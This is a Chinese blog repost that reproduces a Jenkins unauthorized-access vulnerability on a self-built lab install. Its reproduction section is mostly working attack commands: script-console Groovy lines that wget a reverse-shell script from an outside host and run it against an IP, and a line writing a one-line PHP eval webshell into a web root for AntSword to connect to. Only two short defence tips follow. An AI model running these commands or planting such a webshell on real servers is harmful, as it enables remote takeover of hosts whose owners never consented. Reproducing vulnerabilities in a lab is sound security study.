jenkins未授权访问漏洞总结

最新推荐文章于 2024-05-17 02:50:54 发布
最新推荐文章于 2024-05-17 02:50:54 发布
阅读量593 收藏 1
点赞数
分类专栏: 未授权访问 文章标签: 安全漏洞
原文链接:https://www.cnblogs.com/rnss/p/13378182.html
版权

jenkins未授权访问漏洞复现

0x00 漏洞描述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

0x01 漏洞环境搭建(win10)
官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io

运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务
在这里插入图片描述
之后访问http://localhost:8080即可

0x02 漏洞复现
1、浏览器访问http://localhost:8080/manage,可以看到没有做任何限制,可以直接访问
在这里插入图片描述

2、点击”脚本命令行”

3、直接wget下载back.py反弹shell

println “wget http://xxx.secpulse.com/tools/back.py -P /tmp/”.execute().text
println “python /tmp/back.py 10.1.1.111 8080”.execute().text

back.py并不需要root权限

4、利用”脚本命令行”上传webshell,内容如下:

new File(“D:\phpstudy_pro\WWW\ma.php”).write(’<?php @eval($_POST[cmd]);?>’);

成功写入

5、蚁剑连接

在这里插入图片描述

0x03 漏洞防御
1、对后台控制页面做登录验证限制

2、升级版本

qq_45746681
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jenkins授权访问漏洞记录(端口:7001,80,8080,50000)
墨痕诉清风的博客
11-12 1946
一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 docker pull docker.io/jenkins 开启服务(我执行的第一条命令即可) How to use this image docker run -p 8080:8080 -p 50000:50000 jenkins This will store the workspace
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1732
Jenkins授权访问漏洞
利用jenkins授权漏洞获取主机权限
Bird&Bird
05-19 449
目录一、背景二、漏洞原因三、漏洞复现 一、背景 Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 二、漏洞原因 jenkins 设置帐号密码,或者使用了弱帐号密码 三、漏洞复现 1、访问http://192.168.10.27:1234/script,发现不需要登录就可以访问。 2、输入命令执行,发现可以执行任意命令 print
Jenkins授权访问漏洞&amp;命令执行
最新发布
2401_85014013的博客
05-17 428
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 8861
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
Jenkins安全基线
个人博客
12-28 786
Jenkins安全基线 访问控制 1.高危-启用Jenkins安全性设置 描述: 默认情况下,匿名用户没有权限,而登录的用户具有完全的控制权。用户可以使用用户名和密码登录,以执行匿名用户不可用的操作。哪些操作要求用户登录取决于所选择的授权策略及其配置。对于任何非本地(测试)Jenkins环境,应始终启用此复选框。 加固建议: 打开jenkins控制台,依次选择 系统管理->全局安全配置,勾选启用安全性设置 2.中危-配置NLP TCP端口 描述: Jenkins使用TCP端口与通过JNLP协议启动的代
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
web应用漏洞.docx
07-05
10. JBoss jmx-console 授权访问漏洞:攻击者可以通过该漏洞访问授权的资源。 Web 应用漏洞是非常危险的,攻击者可以通过这些漏洞执行任意代码、获取敏感信息、提升权限等。因此,开发者和管理员必须尽力保护...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
CVE-2019-1003000是一个严重的安全漏洞,允许授权的攻击者在认证的情况下执行任意代码。复现这个漏洞需要对Java、Jenkins和网络请求有深入的理解。在实际环境中,必须及时修复此类漏洞,以防止潜在的攻击。...
信息安全_数据安全_Hacking Jenkins !.pdf
08-22
- 访问控制列表(ACL)绕过:攻击者可能利用漏洞绕过权限限制,访问授权的功能或数据。 - 沙箱逃脱:如果沙箱机制存在漏洞,攻击者可能能够执行恶意代码,获取服务器的更高权限。 - 登录门户攻击:攻击者可能...
基于python+Django的漏洞扫描系统源码数据库.zip
10-06
Django的内置认证和权限系统可以用于限制用户访问扫描结果,防止授权访问。同时,应确保扫描过程不会对目标系统造成过度负担或引发拒绝服务攻击。 6. 系统优化与性能: 为了提高扫描效率,可以采用多线程或多...
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4495
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
jenkins授权访问漏洞复现
zhangpeng999123的博客
08-25 867
1安装jenkins wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz #安装jdk tar zxvf jdk-8u45-linux-x64.ta.
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1311
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins授权访问漏洞
Kevin's Blog
07-31 1477
文章目录漏洞介绍环境配置配置主机下载安装漏洞利用防御建议 漏洞介绍 环境配置 配置主机 受害者IP:192.168.253.128 攻击者IP:192.168.1.102 系统内核版本: 下载安装 下载一: 镜像站下载(优点:下载快;缺点:不支持所有版本) https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/ 下载二: 官方下载(优点:版本全;缺点:下载慢) 官方下载系统内核对应的安装包(这里是rpm包安装方式) http://mirrors
漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)
七天
11-25 4456
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
Jenkins plugin manager 存在存储型XSS漏洞(CVE-2023-27898)
murphysec的博客
03-15 861
Jenkins是一款Java编写的集成工具。 该项目受影响版本存在存储型XSS漏洞。该漏洞是由于在呈现插件版本与Jenkins plugin manager版本不兼容的错误信息时没有进行转义。 攻击者可向Jenkins实例中配置的更新站点提供插件,当Jenkins实例加载插件时,错误信息处的JavaScript代码便会被浏览器执行。
漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 917
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
Jenkins 任意文件读取漏洞
慢慢来的博客
07-26 678
Jenkins通过stapler处理请求,所以从web.xml开始,从doDynamic 方法到serveLocalizedFile 方法到request.getLocale() ,Jetty 在获取 Locale 的时候直接从 HTTP Headers 里取出 Accept-Language 头,用 - 分割后返回了一个 Locale 对象。也就是我传入Accept-Language: ../....
Jenkins迁移梳理及踩坑总结(个人精华版)
08-28
本文总结jenkins运维过程中迁移思路,迁移过程以及踩过的坑点,特此梳理,以供学习使用.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值